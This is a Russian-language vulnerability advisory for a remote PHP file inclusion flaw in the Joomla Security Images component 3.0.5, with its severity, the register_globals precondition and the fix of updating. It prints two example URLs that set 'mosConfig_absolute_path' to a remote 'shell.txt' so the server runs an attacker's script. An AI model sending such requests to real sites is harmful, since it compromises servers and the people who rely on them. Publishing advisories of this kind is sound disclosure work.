PHP-инклюдинг в Joomla Security Images

Дата публикации:
03.08.2006
Дата изменения:
24.03.2009
Всего просмотров:
6222
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Security Images 3.x (компонент к Joomla)
Уязвимые версии: Security Images (Joomla) 3.0.5, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path". Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt
http://victim/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt

URL производителя: forge.joomla.org/sf/projects/com_securityimages

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities

или введите имя

CAPTCHA